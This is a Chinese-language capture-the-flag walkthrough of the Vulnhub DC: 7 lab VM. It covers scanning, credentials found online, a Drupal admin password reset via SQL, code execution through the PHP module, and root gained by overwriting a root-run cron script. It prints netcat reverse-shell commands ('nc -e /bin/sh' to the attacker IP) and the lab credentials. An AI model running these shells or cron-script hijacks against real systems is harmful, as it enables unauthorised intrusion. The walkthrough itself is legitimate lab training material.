Vulnhub DC 系列看來是沒有辦法在農曆春節前解完,目前來到了第七第 DC: 7 ,還剩下兩題,在解題過程中其實也都還算順遂,只是對於某些 CMS 或是環境不熟導致徘徊不前,但至少解題思路都還算清晰明確且可行。
環境設定
VirtualBox: Kali & DC: 7
Net Config: NAT Network
尋找靶機
$ nmap 10.0.2.1/24 -sP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 09:52 CST
Nmap scan report for 10.0.2.1
Host is up (0.010s latency).
Nmap scan report for 10.0.2.2
Host is up (0.00071s latency).
Nmap scan report for 10.0.2.15
Host is up (0.000098s latency).
Nmap scan report for 10.0.2.18
Host is up (0.00081s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.05 seconds
$ nmap 10.0.2.18 -p- -A
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 09:52 CST
Nmap scan report for 10.0.2.18
Host is up (0.00074s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
| 256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_ 256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open ssl/http Apache/2.4.25 (Debian)
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.27 seconds
解題過程
Wappalyzer
這是個 Drupal 8 的 CMS。
Get the shell via SSH
首先針對 Drupal 8 做了各種嘗試,並把找得到的 PoC 都跑過一輪沒有結果,於是又回過頭來找尋提示,這邊比較有趣的點是 What you will have to do, is to think "outside" the box,在想線索可能不在靶機上?
結果在最下方發現 @DC7USER 字樣,並且 Google 後得到 Dc7User 該使用者的資料,並他存在一個名稱為 staffdb 的 Repositories,發現 Readme.md 就寫著這是 DC: 7 該題的線索,並在 config.php 檔案底下發現帳號密碼組。
<?php
$servername = "localhost";
$username = "dc7user";
$password = "MdR3xOgB7#dW";
$dbname = "Staff";
$conn = mysqli_connect($servername, $username, $password, $dbname);
?>
嘗試登入 Drupal 失敗,並轉為嘗試 SSH 且登入成功。
成功登入後,家目錄底下存放 backups 資料夾與 mbox 文字檔,其中 mbox 是信件內容,裡從裡面可以發現有些備份紀錄,擷取一封信件觀察後發現,似乎有一隻程式被寫到 crontab 中,並且是以 root 的身分去執行,大致行為就是備份網站資料到 dc7user 的 backups 資料夾底下。
嘗試透過 crontab -l 查看,但只能看到自己的排程,移動到 /opt/scripts/ 觀察發現,該檔案的群組權限為 www-data,意思可能需要藉由 Drupal 取得一個 shell 並且改寫 backups.sh 檔案內容,讓 Root 幫忙做點事情,具體策略如下:
- 從 Drupal 的設定檔中找出資料庫登入資訊
- 嘗試找到登入 Drupal 方法,並尋找機會 RCE
- 成功 RCE 之後,以 www-data 身分竄改 backups.sh 內容
由於 backups 資料夾底下的備份資料有被加密,於是觀察到 /opt/scripts/backups.sh 發現加密方法與密鑰。
cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
登入資料庫
為了取得 Drupal 的控制權,需要先挖出使用者名稱與密碼,藉由設定檔取得資料庫登入資訊,再藉由資料庫取得當前使用者密碼,當然也可以直接修改密碼來取得控制權限,這套路在 DC: 1 時就玩過。
$ cat /var/www/html/sites/default/settings.php
...
$databases['default']['default'] = array (
'database' => 'd7db',
'username' => 'db7user',
'password' => 'yNv3Po00',
'prefix' => '',
'host' => 'localhost',
'port' => '',
'namespace' => 'Drupal\\Core\\Database\\Driver\\mysql',
'driver' => 'mysql',
);
$ mysql -u db7user -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 9
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> use d7db;
MariaDB [d7db]> select * from users_field_data;
+-----+----------+--------------------+--------------------------+---------+---------------------------------------------------------+-------------------+---------------------+--------+------------+------------+------------+------------+-------------------+------------------+
| uid | langcode | preferred_langcode | preferred_admin_langcode | name | pass | mail | timezone | status | created | changed | access | login | init | default_langcode |
+-----+----------+--------------------+--------------------------+---------+---------------------------------------------------------+-------------------+---------------------+--------+------------+------------+------------+------------+-------------------+------------------+
| 0 | en | en | NULL | | NULL | NULL | | 0 | 1567054076 | 1567054076 | 0 | 0 | NULL | 1 |
| 1 | en | en | NULL | admin | $S$Ead.KmIcT/yfKC.1H53aDPJasaD7o.ioEGiaPy1lLyXXAJC/Qi4F | [email protected] | Australia/Melbourne | 1 | 1567054076 | 1567054076 | 1567098850 | 1567098643 | [email protected] | 1 |
| 2 | en | en | en | dc7user | $S$EKe0kuKQvFhgFnEYMpq.mRtbl/TQ5FmEjCDxbu0HIHaO0/U.YFjI | [email protected] | Australia/Brisbane | 1 | 1567057938 | 1567057938 | 0 | 0 | [email protected] | 1 |
+-----+----------+--------------------+--------------------------+---------+---------------------------------------------------------+-------------------+---------------------+--------+------------+------------+------------+------------+-------------------+------------------+
3 rows in set (0.00 sec)
由於密碼是經過 Hash 的,這時參考「Drupal 8 → How to manually reset an admin password on CentOS」一文,可以使用 php core/scripts/password-hash.sh "NewPasswordHere" 來產生 HASH 後的密碼。
dc7user@dc-7:~$ cd /var/www/html/core/scripts/
dc7user@dc-7:/var/www/html/core/scripts$ php password-hash.sh "key123456"
password: key123456 hash: $S$E9iftHmVReTilu0OtcE02AX8.kJh7cwuslb0668a1kBrAt4j/fzE
接著就是取代 admin 原本的密碼。
MariaDB [d7db]> UPDATE users_field_data SET pass='$S$E9iftHmVReTilu0OtcE02AX8.kJh7cwuslb0668a1kBrAt4j/fzE' WHERE name = 'admin';
Query OK, 1 row affected (0.06 sec)
Rows matched: 1 Changed: 1 Warnings: 0
修改完畢之後會發現還是無法登入,此時記得還要清除 flood 與 cache_entity 紀錄。
MariaDB [d7db]> truncate table flood;
Query OK, 0 rows affected (0.32 sec)
MariaDB [d7db]> truncate table cache_entity;
Query OK, 0 rows affected (0.22 sec)
登入成功之後,發現無法像是 DC: 3 一樣直接編輯 PHP,隨即又找到 Install new module 上傳點,似乎可以透過安裝模組來 RCE,在官方找到 PHP 模組,該模組可以讓使用者在撰寫文章時,使用 PHP 語法。
由於可以直接使用 URL 進行安裝(感覺起來好方便好可怕ლ(╹◡╹ლ)?),於是就填上了 PHP 模組的檔案連結 https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz。
安裝成功後直接 Enable。
接著新增文章,並選擇 Text format 為 PHP code,就可以開始上馬了。
Get Webshell
成功新增文章之後,直接瀏覽後,再透過 POST 的方式操作 Webshell,接著又是把一個 Reverse shell 丟回來的操作。
Listen
nc -nl -vv -p 8888
Victim
nc -e /bin/sh 10.0.2.15 8888
python -c "import pty;pty.spawn('/bin/bash')"
Get Root to Win
然後現在終於可以編輯 backups.sh 腳本,讓 root 來幫你做點事情。
echo "#!/bin/bash" >/opt/scripts/backups.sh
echo "nc -e /bin/sh 10.0.2.15 8889" >> /opt/scripts/backups.sh
記得先建立 nc 連線,並且靜候佳音。
cd /root
ls
theflag.txt
cat theflag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-7. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.
I'm sending out an especially big thanks to:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
If you enjoyed this CTF, send me a tweet via @DCAU7.
